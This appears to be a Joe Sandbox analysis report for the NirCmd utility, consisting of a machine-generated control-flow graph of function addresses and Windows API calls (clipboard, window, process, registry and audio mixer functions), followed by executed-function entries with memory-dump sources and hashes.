14000a15f 5339->5341 5342 14000a150 5339->5342 5340->5332 5343 140006f64 MessageBoxA 5342->5343 5343->5341 5344 14000301c ReadFile 5345 14000a79c memset 5346 14000a7ef strcpy 5345->5346 5347 14000a800 strcat 5345->5347 5346->5347 5350 14000a4c4 5347->5350 5351 14000a4d9 5350->5351 5352 14000a50c 6 API calls 5351->5352 5365 140015b50 5351->5365 5354 14000a5da 5352->5354 5357 14000a5ed 5352->5357 5368 140011f14 5354->5368 5356 14000a772 5357->5356 5358 14000a708 5357->5358 5359 14000a67b memset memset GetModuleFileNameA strcpy 5357->5359 5362 140011f14 2 API calls 5358->5362 5363 14000a727 5358->5363 5360 14000292c strlen 5359->5360 5361 14000a6de strcat CopyFileA 5360->5361 5361->5358 5362->5363 5363->5356 5364 140011f14 2 API calls 5363->5364 5364->5356 5366 140015b72 5365->5366 5367 140015b5e _onexit 5365->5367 5366->5352 5367->5352 5369 140011f42 GetProcAddress 5368->5369 5370 140011f29 LoadLibraryA 5368->5370 5371 140011f4e 5369->5371 5370->5369 5370->5371 5371->5357 5372 14000b020 5374 14000b025 5372->5374 5373 140006ea0 81 API calls 5375 14000b10a 5373->5375 5374->5373 5376 14000b17d _stricmp 5375->5376 5377 14000b1a1 _stricmp 5375->5377 5379 14000b1fe _stricmp 5375->5379 5380 14000b22c _stricmp 5375->5380 5381 14000b250 _stricmp 5375->5381 5382 140002df4 2 API calls 5375->5382 5383 14000b274 _stricmp 5375->5383 5385 14000b29b MessageBoxA 5375->5385 5386 14000b2d9 5375->5386 5376->5375 5376->5377 5378 14000b1b8 _stricmp 5377->5378 5378->5375 5378->5379 5379->5375 5379->5380 5380->5375 5380->5381 5381->5375 5381->5383 5384 14000b1eb Sleep 5382->5384 5383->5375 5384->5379 5385->5375 5385->5386 5387 140001720 5388 140001734 5387->5388 5391 140002d28 6 API calls 5388->5391 5390 140001749 5391->5390 5392 1400015a0 5393 1400015c7 5392->5393 5394 1400015dd 5392->5394 5396 140003c34 5393->5396 5397 140003c63 5396->5397 5398 140003c7c ??2@YAPEAX_K memset memcpy 5396->5398 5397->5398 5400 140003cea 5397->5400 5399 140003ce2 ??3@YAXPEAX 5398->5399 5398->5400 5399->5400 5400->5394 5401 140012ea4 5402 140012ecc 5401->5402 5403 140012eed memset memcpy strlen 5402->5403 5417 1400130b4 5402->5417 5404 140012fd2 _stricmp 5403->5404 5405 140012f39 strcmp 5403->5405 5408 140012feb _stricmp 5404->5408 5404->5417 5406 140012fb1 strcmp 5405->5406 5407 140012f57 GetCurrentProcess GetModuleHandleA GetProcAddress 5405->5407 5406->5404 5409 140012f92 5406->5409 5407->5409 5410 140013004 _stricmp 5408->5410 5408->5417 5409->5404 5411 14001301d _stricmp 5410->5411 5410->5417 5412 140013036 _stricmp 5411->5412 5411->5417 5413 14001304b _stricmp 5412->5413 5412->5417 5414 140013060 _stricmp 5413->5414 5413->5417 5415 140013075 _stricmp 5414->5415 5414->5417 5416 14001308a _stricmp 5415->5416 5415->5417 5416->5417 5418 14001309f _stricmp 5416->5418 5418->5417 5424 140013728 LoadLibraryA 5425 140013749 9 API calls 5424->5425 5426 140013842 5424->5426 5425->5426 5427 140013da8 5428 140013db8 GetCursorPos SetForegroundWindow TrackPopupMenu 5427->5428 5429 140013dfa 5427->5429 5428->5429 5430 140008dac IsWindowVisible 5431 140008fb4 5430->5431 5432 140008dda 5430->5432 5433 140008de3 memset GetClassNameA strcmp 5432->5433 5434 140008e26 5432->5434 5433->5431 5433->5434 5435 140008e90 5434->5435 5436 140008e3b memset GetWindowTextA 5434->5436 5435->5431 5438 140008f11 _stricmp 5435->5438 5439 140008eae memset GetWindowThreadProcessId 5435->5439 5437 140002960 2 API calls 5436->5437 5437->5435 5441 140008f67 _stricmp 5438->5441 5442 140008f37 5438->5442 5440 14001223c 5 API calls 5439->5440 5445 140008ee9 5440->5445 5441->5431 5444 140008f7a 5441->5444 5452 1400030e8 5442->5452 5447 1400030e8 12 API calls 5444->5447 5448 140002960 2 API calls 5445->5448 5450 140008f8c GetDlgItem 5447->5450 5451 140008f08 5448->5451 5449 140008fae SendMessageA 5449->5431 5450->5449 5451->5431 5451->5438 5453 1400030fd 5452->5453 5454 14000310b _stricmp 5453->5454 5456 140003101 GetDlgItem 5453->5456 5455 140003128 _stricmp 5454->5455 5454->5456 5455->5456 5457 140003145 _stricmp 5455->5457 5456->5449 5457->5456 5458 14000315f _stricmp 5457->5458 5458->5456 5459 140003179 _stricmp 5458->5459 5459->5456 5460 140003193 _stricmp 5459->5460 5460->5456 5461 1400031ad _stricmp 5460->5461 5461->5456 5462 1400031c7 5461->5462 5463 1400031d8 5 API calls 5462->5463 5463->5456 5464 140015a30 memset RegOpenKeyExA 5465 140015ad3 5464->5465 5466 140015a87 RegQueryValueExA RegCloseKey 5464->5466 5467 140015b2a 5465->5467 5468 140015ada waveOutGetNumDevs 5465->5468 5466->5465 5468->5467 5469 140015aed memset waveOutGetDevCapsA 5468->5469 5470 140015b22 5469->5470 5471 140015b10 _stricmp 5469->5471 5470->5467 5470->5469 5471->5467 5471->5470 5472 140012930 GetWindowThreadProcessId 5473 140012982 5472->5473 5474 140012958 5472->5474 5475 14001296b PostMessageA 5474->5475 5476 14001295e IsWindowVisible 5474->5476 5475->5473 5476->5473 5476->5475 5477 140015fb0 5478 140015fc5 5477->5478 5479 140015fc0 ??3@YAXPEAX 5477->5479 5479->5478 5480 140007c30 _stricmp 5481 140007c56 _stricmp 5480->5481 5482 140007c4c 5480->5482 5481->5482 5483 140007c70 _stricmp 5481->5483 5483->5482 5484 140007c8a _stricmp 5483->5484 5484->5482 5485 140007ca4 _stricmp 5484->5485 5485->5482 5486 140007cbe _stricmp 5485->5486 5486->5482 5487 1400048b0 5492 1400048df 5487->5492 5488 1400049e2 5489 1400042b8 2 API calls 5488->5489 5490 1400049f7 5489->5490 5491 140004930 _mbsicmp memset 5491->5492 5492->5488 5492->5491 5494 1400042b8 GetModuleHandleA 5492->5494 5495 1400042ec GetProcAddress 5494->5495 5496 140004301 5494->5496 5495->5496 5496->5492 5497 1400128b4 5498 1400128dc 5497->5498 5499 1400128bc memcpy 5497->5499 5499->5498 5500 140008c34 memset 5501 140008c6b 5500->5501 5502 140008cfb memset 5501->5502 5504 140008c83 strlen 5501->5504 5503 140008d1e GetModuleHandleA 5502->5503 5505 140008d96 5503->5505 5506 140008d30 GetProcAddress 5503->5506 5504->5502 5507 140008c91 atoi GetModuleHandleA 5504->5507 5506->5505 5512 140008d45 5506->5512 5507->5505 5508 140008cbc GetProcAddress 5507->5508 5508->5505 5511 140008cd5 5508->5511 5509 140002960 strlen strlen 5509->5512 5510 140008d8e strcpy 5510->5505 5511->5505 5511->5510 5512->5503 5512->5505 5512->5509 5512->5511 5513 140003d34 5514 140003d59 ??2@YAPEAX_K 5513->5514 5515 140003d4c ??3@YAXPEAX 5513->5515 5515->5514 5516 1400035b8 OpenClipboard 5517 1400036a1 5516->5517 5518 1400035e9 GetClipboardData 5516->5518 5519 14000369b CloseClipboard 5518->5519 5520 1400035fe GlobalLock 5518->5520 5519->5517 5520->5519 5521 140003613 5520->5521 5522 140003655 5521->5522 5523 14000361b CreateFileA SetFilePointer 5521->5523 5531 1400028bc CreateFileA 5522->5531 5524 14000365c 5523->5524 5526 140003692 GlobalUnlock 5524->5526 5532 1400028ec strlen WriteFile 5524->5532 5526->5519 5528 140003670 5529 140003684 CloseHandle 5528->5529 5533 1400028ec strlen WriteFile 5528->5533 5529->5526 5531->5524 5532->5528 5533->5529 3816 14000423a 3817 14000423e DialogBoxParamA 3816->3817 3818 140004266 3816->3818 3817->3818 3827 140003758 free free 3818->3827 3820 140004280 3828 140003758 free free 3820->3828 3822 14000428d 3829 140003758 free free 3822->3829 3824 14000429a 3825 1400042a7 FreeLibrary 3824->3825 3826 1400042ad 3824->3826 3825->3826 3827->3820 3828->3822 3829->3824 5534 14000783c memset strcmp 5535 14000792a 5534->5535 5536 14000789a strcmp 5534->5536 5536->5535 5537 1400078ad strlen strlen 5536->5537 5538 1400078ce 5537->5538 5539 1400078de 5537->5539 5540 140002c40 3 API calls 5538->5540 5539->5535 5541 1400074bc 29 API calls 5539->5541 5540->5539 5541->5535 5542 140007d3c 5543 140012788 6 API calls 5542->5543 5544 140007d68 5543->5544 5545 140007d73 5544->5545 5547 1400129f8 OpenProcess 5544->5547 5548 140012a1a TerminateProcess CloseHandle 5547->5548 5549 140012a30 5547->5549 5548->5549 5549->5545 5550 140001bbc 5551 140001bd8 5550->5551 5565 14000288c CreateFileA 5551->5565 5553 140001be5 5554 140001bf2 memset ReadFile 5553->5554 5555 140001d59 5553->5555 5556 140001c41 5554->5556 5557 140001d50 CloseHandle 5554->5557 5556->5557 5558 140001c4e ReadFile OpenClipboard 5556->5558 5557->5555 5558->5557 5559 140001c8c EmptyClipboard 5558->5559 5560 140001d4a CloseClipboard 5559->5560 5561 140001c9a 5559->5561 5560->5557 5561->5560 5562 140001cc6 GlobalAlloc GlobalLock 5561->5562 5563 140001cb9 RegisterClipboardFormatA 5561->5563 5562->5561 5564 140001ce7 SetFilePointer ReadFile GlobalUnlock SetClipboardData 5562->5564 5563->5562 5564->5561 5565->5553 5566 140001dbc GetDlgItem SetFocus 5573 140009a40 5574 140009a50 memset GetWindowTextA strlen 5573->5574 5575 140009ad7 _stricmp 5574->5575 5576 140009d3a _stricmp 5574->5576 5579 140009af8 _stricmp 5575->5579 5580 140009b10 _stricmp 5575->5580 5577 140009d5b IsWindowVisible 5576->5577 5578 140009d8d _stricmp 5576->5578 5577->5578 5581 140009d68 GetWindowRect 5577->5581 5582 140009e44 _stricmp 5578->5582 5583 140009da4 IsWindowVisible 5578->5583 5579->5580 5584 140009b23 _strnicmp 5580->5584 5585 140009b40 _stricmp 5580->5585 5581->5578 5586 140009d85 5581->5586 5591 140009e57 5582->5591 5583->5582 5587 140009db5 memset GetClassNameA _stricmp 5583->5587 5584->5585 5588 140009b53 5585->5588 5589 140009b6d _stricmp 5585->5589 5586->5578 5587->5582 5595 140009df5 _stricmp 5587->5595 5590 140002960 2 API calls 5588->5590 5593 140009bc7 5589->5593 5594 140009b80 strlen 5589->5594 5596 140009b63 5590->5596 5592 140009e75 5591->5592 5623 14000902c memset 5591->5623 5599 140009bcc _stricmp 5593->5599 5594->5593 5598 140009b95 strlen _strnicmp 5594->5598 5595->5582 5600 140009e0a _stricmp 5595->5600 5596->5589 5598->5599 5601 140009c01 _stricmp 5599->5601 5602 140009bdf 5599->5602 5600->5582 5603 140009e1f GetWindowRect 5600->5603 5605 140009c14 memset GetClassNameA _stricmp 5601->5605 5606 140009c50 _stricmp 5601->5606 5604 140002df4 2 API calls 5602->5604 5603->5582 5607 140009e3c 5603->5607 5608 140009be7 GetWindowLongA 5604->5608 5605->5606 5609 140009c67 IsWindowVisible 5606->5609 5620 140009caa 5606->5620 5607->5582 5608->5601 5610 140009c78 GetWindowThreadProcessId 5609->5610 5609->5620 5611 140009cb8 5610->5611 5612 140009ca0 5610->5612 5614 14001212c 15 API calls 5611->5614 5613 140002df4 2 API calls 5612->5613 5613->5620 5615 140009cbd 5614->5615 5616 140009cc1 memset 5615->5616 5617 140009d26 5615->5617 5619 14001223c 5 API calls 5616->5619 5618 140006f64 MessageBoxA 5617->5618 5618->5620 5622 140009ceb _stricmp 5619->5622 5620->5576 5622->5620 5624 1400029dc 2 API calls 5623->5624 5625 14000908d _stricmp 5624->5625 5626 1400090b3 _stricmp 5625->5626 5627 1400090a5 PostMessageA 5625->5627 5629 1400090cb _stricmp 5626->5629 5663 1400090e3 5626->5663 5631 1400091dc 5627->5631 5630 1400090ed _stricmp 5629->5630 5629->5663 5632 14000910c _stricmp 5630->5632 5630->5663 5631->5592 5634 140009124 ShowWindow 5632->5634 5635 140009139 _stricmp 5632->5635 5633 140009474 ShowWindow 5633->5631 5634->5663 5636 140009155 5635->5636 5637 1400091e8 _stricmp 5635->5637 5639 1400031d8 5 API calls 5636->5639 5638 140009208 _stricmp 5637->5638 5637->5663 5640 140009227 _stricmp 5638->5640 5638->5663 5641 140009182 5639->5641 5642 14000924c _stricmp 5640->5642 5640->5663 5643 1400031d8 5 API calls 5641->5643 5644 140009264 5642->5644 5645 14000929f _stricmp 5642->5645 5646 140009198 GetModuleHandleA GetProcAddress 5643->5646 5647 1400031d8 5 API calls 5644->5647 5648 1400092b7 5645->5648 5649 1400092bf _stricmp 5645->5649 5646->5631 5653 140009277 SetWindowPos 5647->5653 5650 1400098a5 SetFocus 5648->5650 5651 1400092d7 GetWindowPlacement SetWindowPlacement SetForegroundWindow 5649->5651 5652 140009319 _stricmp 5649->5652 5650->5631 5651->5631 5654 140009331 5652->5654 5655 140009338 _stricmp 5652->5655 5653->5631 5657 14000937d EnableWindow 5654->5657 5655->5654 5658 140009354 _stricmp 5655->5658 5657->5631 5659 14000938b _stricmp 5658->5659 5660 14000936c IsWindowEnabled 5658->5660 5661 1400093a3 IsWindowVisible 5659->5661 5662 1400093c4 _stricmp 5659->5662 5660->5657 5661->5663 5664 1400093dc memset GetWindowPlacement 5662->5664 5665 14000941e _stricmp 5662->5665 5663->5633 5664->5663 5666 140009436 memset GetWindowPlacement 5665->5666 5667 14000947f _stricmp 5665->5667 5666->5633 5666->5663 5668 14000949b _stricmp 5667->5668 5669 14000997d InvalidateRect 5667->5669 5670 14000951e _stricmp 5668->5670 5687 1400094b3 5668->5687 5669->5631 5671 140009536 5670->5671 5672 14000957c _stricmp 5670->5672 5675 1400031d8 5 API calls 5671->5675 5673 1400095e3 _stricmp 5672->5673 5674 140009594 5672->5674 5679 140009671 _stricmp 5673->5679 5680 1400095fb GetParent 5673->5680 5677 1400031d8 5 API calls 5674->5677 5676 140009548 5675->5676 5683 1400031d8 5 API calls 5676->5683 5686 1400095a6 5677->5686 5678 1400031d8 5 API calls 5678->5687 5684 140009689 EnumChildWindows 5679->5684 5685 1400096bc _stricmp 5679->5685 5681 140009609 GetDesktopWindow 5680->5681 5682 14000960f GetWindowRect GetWindowRect 5680->5682 5681->5682 5682->5653 5688 14000955d 5683->5688 5684->5631 5689 1400097a7 _stricmp 5685->5689 5706 1400096d8 5685->5706 5690 1400031d8 5 API calls 5686->5690 5687->5631 5687->5653 5687->5678 5693 1400031d8 5 API calls 5688->5693 5691 1400097d7 _stricmp 5689->5691 5692 1400097bf SetWindowTextA 5689->5692 5694 1400095bb 5690->5694 5695 14000981c _stricmp 5691->5695 5696 1400097ef 5691->5696 5692->5631 5697 14000956f 5693->5697 5698 1400031d8 5 API calls 5694->5698 5700 140009834 5695->5700 5701 140009870 _stricmp 5695->5701 5699 1400030e8 12 API calls 5696->5699 5704 140009865 SendMessageA 5697->5704 5698->5627 5703 1400097fe GetDlgItem 5699->5703 5705 1400030e8 12 API calls 5700->5705 5707 140009888 5701->5707 5708 1400098b0 _stricmp 5701->5708 5702 1400031d8 5 API calls 5702->5706 5703->5697 5704->5631 5711 140009843 GetDlgItem 5705->5711 5706->5631 5706->5702 5712 14000971f GetWindowRect GetParent 5706->5712 5713 1400030e8 12 API calls 5707->5713 5709 1400098e7 _stricmp 5708->5709 5710 1400098c8 5708->5710 5715 140009915 _stricmp 5709->5715 5716 1400098ff 5709->5716 5714 140002df4 2 API calls 5710->5714 5711->5704 5712->5653 5717 140009753 MapWindowPoints 5712->5717 5718 140009897 GetDlgItem 5713->5718 5722 1400098d7 5714->5722 5720 140009943 _stricmp 5715->5720 5721 14000992d 5715->5721 5719 140002df4 2 API calls 5716->5719 5717->5653 5718->5650 5719->5722 5724 140009991 _stricmp 5720->5724 5725 14000995b 5720->5725 5723 140002df4 2 API calls 5721->5723 5736 140003278 GetWindowLongA 5722->5736 5723->5722 5724->5631 5726 1400099a9 LoadLibraryA 5724->5726 5727 140002df4 2 API calls 5725->5727 5726->5631 5729 1400099be GetProcAddress 5726->5729 5727->5722 5730 1400099d6 5729->5730 5731 140009a1a FreeLibrary 5729->5731 5732 140002df4 2 API calls 5730->5732 5731->5631 5733 1400099e5 5732->5733 5734 140003278 2 API calls 5733->5734 5735 140009a09 5734->5735 5735->5731 5737 1400032a8 SetWindowLongA 5736->5737 5737->5669 5739 140006540 5740 14000658a 5739->5740 5744 140006567 5739->5744 5741 140006592 PostQuitMessage 5740->5741 5742 14000659a DefWindowProcA 5740->5742 5741->5742 5743 140006582 PostQuitMessage 5743->5740 5744->5742 5744->5743 5745 1400036c0 EmptyClipboard 5746 1400036e4 strlen GlobalAlloc 5745->5746 5747 14000373a CloseClipboard 5745->5747 5746->5747 5748 140003708 GlobalLock memcpy GlobalUnlock SetClipboardData 5746->5748 5748->5747 5749 1400016c4 5750 140001701 5749->5750 5751 1400016da 5749->5751 5751->5750 5752 1400016f2 EndDialog 5751->5752 5752->5750 5753 140011ec8 GetModuleHandleA 5754 140011ee8 GetProcAddress 5753->5754 5755 140011efd 5753->5755 5754->5755 5756 140015fcc 5757 140015fea 5756->5757 5758 140015fdc FreeLibrary 5756->5758 5758->5757 5759 140005e4c _stricmp 5760 140005e6f _stricmp 5759->5760 5763 140005e65 5759->5763 5761 140005e8c _stricmp 5760->5761 5760->5763 5762 140005ea9 _stricmp 5761->5762 5761->5763 5762->5763 5764 140005ec6 _stricmp 5762->5764 5764->5763 5765 140005ee3 _stricmp 5764->5765 5765->5763 5766 140005efd _stricmp 5765->5766 5766->5763 5767 140005f17 _stricmp 5766->5767 5767->5763 5768 140005f31 _stricmp 5767->5768 5768->5763 5769 140005f4b _stricmp 5768->5769 5769->5763 5770 140005f65 5769->5770 5771 140002df4 2 API calls 5770->5771 5771->5763 5772 14000a84c GetWindowThreadProcessId 5773 14000a86f 5772->5773 5774 14000abcc CoInitialize 5775 14000ac3d 5774->5775 5776 14000ac00 5774->5776 5778 140013fc0 18 API calls 5775->5778 5787 14000ac95 5775->5787 5776->5775 5777 1400031d8 5 API calls 5776->5777 5777->5776 5780 14000ac56 5778->5780 5779 1400159dc CoCreateInstance 5782 14000acec 5779->5782 5781 14000ac78 _stricmp 5780->5781 5784 1400031d8 5 API calls 5780->5784 5781->5787 5788 14000ac9a 5781->5788 5783 14000ad19 5782->5783 5797 140014ed8 5782->5797 5786 1400159dc CoCreateInstance 5783->5786 5789 14000ac76 5784->5789 5790 14000ad1e CoUninitialize 5786->5790 5787->5779 5791 140013fc0 18 API calls 5788->5791 5789->5781 5793 14000ac9f MultiByteToWideChar 5791->5793 5794 140013fc0 18 API calls 5793->5794 5795 14000acc8 5794->5795 5796 140014be8 _wcsicmp 5795->5796 5796->5787 5798 140014f08 5797->5798 5800 140014f16 5797->5800 5799 140013fc0 18 API calls 5798->5799 5798->5800 5799->5800 5800->5783 5801 1400103cd CoInitialize 5802 1400103e3 5801->5802 5803 140013fc0 18 API calls 5801->5803 5804 1400146d0 16 API calls 5802->5804 5803->5802 5805 1400103eb memset memset MultiByteToWideChar MultiByteToWideChar 5804->5805 5806 140013fc0 18 API calls 5805->5806 5807 14001048f 5806->5807 5808 140014b48 2 API calls 5807->5808 5809 1400104a7 5808->5809 5810 14000eb44 CoUninitialize 5809->5810 5811 1400104b3 atof 5809->5811 5814 14000b2d9 5810->5814 5812 1400159dc CoCreateInstance 5811->5812 5813 1400104d9 5812->5813 5813->5810 5815 140015c50 GetStartupInfoA 5816 140015c8d __set_app_type 5815->5816 5818 140015d5f 5816->5818 5819 140015d75 _initterm __getmainargs _initterm 5818->5819 5820 140015e16 5819->5820 5821 14000ad54 5822 14000ad77 5821->5822 5837 140003a10 5822->5837 5825 14000adb2 memset 5832 14000adf2 5825->5832 5826 14000af59 5827 140006f98 9 API calls 5826->5827 5828 14000af61 5827->5828 5829 1400038d0 free 5828->5829 5830 14000af6b 5829->5830 5831 14000ae37 memcpy 5831->5832 5832->5828 5832->5831 5836 140003794 5 API calls 5832->5836 5846 140003758 free free 5832->5846 5847 1400032e4 5832->5847 5834 14000aeaa memset 5834->5832 5836->5832 5854 14000288c CreateFileA 5837->5854 5839 140003a2f 5840 140003a38 GetFileSize 5839->5840 5843 140003ab2 5839->5843 5841 140003a56 5840->5841 5842 140003a4d free 5840->5842 5844 140002a2c 3 API calls 5841->5844 5842->5841 5843->5825 5843->5826 5845 140003a79 ReadFile FindClose 5844->5845 5845->5843 5846->5834 5850 140003322 5847->5850 5848 140003333 strchr 5848->5850 5849 140003369 strchr 5849->5850 5850->5848 5850->5849 5853 140003389 5850->5853 5851 14000340e 5851->5832 5852 1400033f8 memcpy 5852->5851 5853->5851 5853->5852 5854->5839 5855 1400017d4 5878 140015f30 5855->5878 5858 14000181d 5859 140001b9f 5858->5859 5880 1400028bc CreateFileA 5858->5880 5861 140001841 5861->5859 5862 14000184e memset 5861->5862 5863 140001895 memset 5862->5863 5864 140001989 WriteFile 5863->5864 5867 1400018c8 5863->5867 5866 140001b96 CloseHandle 5864->5866 5876 1400019f9 5864->5876 5866->5859 5867->5864 5869 14000196a ReleaseStgMedium 5867->5869 5872 14000190e GetClipboardFormatNameA 5867->5872 5881 140001754 5867->5881 5869->5867 5870 140001b7b ReleaseStgMedium 5870->5876 5871 140001754 4 API calls 5871->5876 5872->5867 5873 140001a4f GlobalLock GlobalSize WriteFile GlobalUnlock 5873->5876 5874 140001ab5 memset 5874->5876 5875 140001ae5 ??2@YAPEAX_K 5875->5876 5876->5866 5876->5870 5876->5871 5876->5873 5876->5874 5876->5875 5877 140001b38 WriteFile ??3@YAXPEAX 5876->5877 5877->5876 5879 1400017ee OleGetClipboard 5878->5879 5879->5858 5879->5859 5880->5861 5882 140001768 GlobalLock GlobalSize GlobalUnlock 5881->5882 5883 14000178a 5881->5883 5884 1400017bd 5882->5884 5883->5884 5885 140001795 memset 5883->5885 5884->5867 5885->5884 5886 1400054d8 5887 140015f30 5886->5887 5888 1400054fa 6 API calls 5887->5888 5889 1400055ea 5888->5889 5890 1400055bc MultiByteToWideChar 5888->5890 5891 14000561d 5889->5891 5892 1400055ef MultiByteToWideChar 5889->5892 5890->5889 5893 140005622 MultiByteToWideChar 5891->5893 5894 14000564a 5891->5894 5892->5891 5893->5894 5895 140005682 LoadLibraryA 5894->5895 5896 140005657 MultiByteToWideChar 5894->5896 5897 140005711 GetLastError 5895->5897 5898 140005697 GetProcAddress 5895->5898 5896->5895 5900 140005719 5897->5900 5899 140005701 5898->5899 5902 1400056af 5898->5902 5901 140005706 FreeLibrary 5899->5901 5901->5900 5902->5901 5903 1400056f7 GetLastError 5902->5903 5903->5901 5904 140005bd8 mixerOpen 5905 140005dfe 5904->5905 5906 140005c30 memset mixerGetLineInfoA 5904->5906 5907 140005df3 mixerClose 5906->5907 5908 140005c76 memset memset mixerGetLineControlsA 5906->5908 5907->5905 5908->5907 5909 140005d00 memset mixerGetControlDetailsA 5908->5909 5909->5907 5911 140005d62 mixerSetControlDetails 5909->5911 5911->5907 5912 140003460 OpenClipboard 5913 1400035a1 5912->5913 5914 14000348a GetClipboardData 5912->5914 5915 14000359b CloseClipboard 5914->5915 5916 14000349f GlobalLock 5914->5916 5915->5913 5916->5915 5917 1400034b4 5916->5917 5918 1400034f6 5917->5918 5919 1400034bc CreateFileA SetFilePointer 5917->5919 5929 1400028bc CreateFileA 5918->5929 5920 140003500 GetFileSize 5919->5920 5923 140003533 5920->5923 5924 14000350f WriteFile 5920->5924 5922 1400034fd 5922->5920 5925 140003592 GlobalUnlock 5923->5925 5926 140003539 wcslen WriteFile 5923->5926 5924->5923 5925->5915 5927 140003584 CloseHandle 5926->5927 5928 140003560 WriteFile 5926->5928 5927->5925 5928->5927 5929->5922 5930 1400080e0 5931 140011d84 13 API calls 5930->5931 5932 14000810d 5931->5932 5966 140012a40 5932->5966 5934 1400081aa 5935 1400081b1 5934->5935 5947 1400081c1 5934->5947 5936 140002df4 2 API calls 5935->5936 5937 1400081ba 5936->5937 5938 14000842a 5937->5938 5942 14000825a memset MultiByteToWideChar OpenProcess 5937->5942 5940 140008437 FreeLibrary 5938->5940 5941 14000843d 5938->5941 5939 1400081f0 _mbsicmp 5939->5937 5939->5947 5940->5941 5943 140008454 5941->5943 5944 140008447 free 5941->5944 5945 140008361 5942->5945 5946 1400082c1 5942->5946 5948 140008461 free 5943->5948 5949 140008466 5943->5949 5944->5943 5950 140008372 memset 5945->5950 5951 14000841c 5945->5951 5952 140001368 5 API calls 5946->5952 5947->5937 5947->5939 5953 140008222 _mbsicmp 5947->5953 5948->5949 5954 140001368 5 API calls 5950->5954 5951->5938 5955 140008421 FreeLibrary 5951->5955 5959 1400082d3 5952->5959 5953->5937 5953->5947 5956 1400083b4 GetLastError 5954->5956 5955->5938 5958 140006f98 9 API calls 5956->5958 5962 140008409 CloseHandle 5958->5962 5960 140008343 GetLastError 5959->5960 5963 1400013e4 5 API calls 5959->5963 5961 140006f98 9 API calls 5960->5961 5965 140008353 CloseHandle 5961->5965 5962->5951 5964 140008335 CloseHandle 5963->5964 5964->5960 5965->5945 5967 140012a64 free 5966->5967 5968 140012a69 CreateToolhelp32Snapshot memset Process32First 5966->5968 5967->5968 5969 140012c64 Process32Next 5968->5969 5970 140012ab7 OpenProcess 5969->5970 5971 140012c7d CloseHandle 5969->5971 5972 140012b30 memset 5970->5972 5976 140012c13 5970->5976 5971->5934 5983 140012ca0 5972->5983 5974 140012b55 5978 140012bfe strcpy 5974->5978 5979 140012b8f GetModuleHandleA 5974->5979 5981 140012164 9 API calls 5974->5981 5975 140002a2c 3 API calls 5975->5976 5976->5969 5976->5975 5977 140012c46 memcpy 5976->5977 5977->5969 5980 140012c0a CloseHandle 5978->5980 5979->5974 5982 140012ba1 GetProcAddress 5979->5982 5980->5976 5981->5980 5982->5974 5984 140012d23 5983->5984 5985 140012caf 6 API calls 5983->5985 5984->5974 5985->5984 5986 1400021e0 memset MultiByteToWideChar 5987 140002060 11 API calls 5986->5987 5988 14000223e 5987->5988 5989 1400057e0 memset memset GetWindowsDirectoryA strlen strlen 5990 14000589f 5989->5990 5991 140005883 5989->5991 5993 140002bb0 GetVersionExA 5990->5993 5992 140002c40 3 API calls 5991->5992 5992->5990 5994 1400058ae 5993->5994 5995 140005af5 FindWindowA 5994->5995 5996 1400058ba FindWindowA 5994->5996 5997 140005bc1 5995->5997 5998 140005b0e GetWindowThreadProcessId PostMessageA 5995->5998 5996->5997 5999 1400058d3 GetWindowThreadProcessId 5996->5999 6000 14000573c 4 API calls 5998->6000 5999->5997 6001 1400058f5 OpenProcess 5999->6001 6023 140005af0 memset CreateProcessA 6000->6023 6002 140005916 6001->6002 6003 14000599b 6001->6003 6007 140001368 5 API calls 6002->6007 6004 1400059a9 PostMessageA 6003->6004 6005 140005bae 6003->6005 6024 14000573c 6004->6024 6005->5997 6009 140005bbb FreeLibrary 6005->6009 6014 140005928 6007->6014 6009->5997 6011 140002bb0 GetVersionExA 6012 1400059ce 6011->6012 6015 1400059d4 EnumWindows 6012->6015 6016 1400059fc memset memset MultiByteToWideChar 6012->6016 6013 140005992 CloseHandle 6013->6003 6014->6013 6017 1400013e4 5 API calls 6014->6017 6018 14000573c 4 API calls 6015->6018 6019 140001368 5 API calls 6016->6019 6020 140005984 CloseHandle 6017->6020 6018->6016 6021 140005a8f CloseHandle 6019->6021 6020->6013 6021->6005 6021->6023 6023->6005 6025 140005746 OpenProcess 6024->6025 6026 140005777 Sleep 6024->6026 6025->6026 6028 14000575e WaitForSingleObject CloseHandle 6025->6028 6027 140005782 6026->6027 6027->6011 6028->6027

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000000140015C78 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                          • Opcode ID: 34eaef9cb68d0d57b01bdeb83a77275bddf2b11a09fe61333579497b7a1a4689
                                                                                                                                                          • Instruction ID: b2c2c76a933534f814a29009beffd812c5aa1c3e2cd763faf93c9363afcdce34
                                                                                                                                                          • Opcode Fuzzy Hash: 34eaef9cb68d0d57b01bdeb83a77275bddf2b11a09fe61333579497b7a1a4689
                                                                                                                                                          • Instruction Fuzzy Hash: F4413831518A81C6E766AF16E4807E873A1F34C3D5F500216FBAA4F2F5DB7AC945CB00
                                                                                                                                                          Function 0000000140015C50 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
